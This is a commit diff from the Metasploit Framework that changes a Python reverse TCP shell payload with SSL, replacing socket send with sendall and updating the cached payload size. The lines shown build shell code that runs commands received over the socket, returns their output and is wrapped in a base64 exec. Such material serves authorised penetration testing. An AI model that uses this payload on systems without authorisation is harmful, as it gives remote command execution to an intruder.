Land #6897, use sendall python rtcp shell with ssl

bug/bundler_fix
Spencer McIntyre 2016-05-21 16:51:10 -04:00
commit 7e34d1e1cf
No known key found for this signature in database
GPG Key ID: C00D6B6AA5E15412
1 changed files with 2 additions and 2 deletions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 557
CachedSize = 561
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
@ -59,7 +59,7 @@ module MetasploitModule
cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
cmd += "\ts.send(stdout_value)\n"
cmd += "\ts.sendall(stdout_value)\n"
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"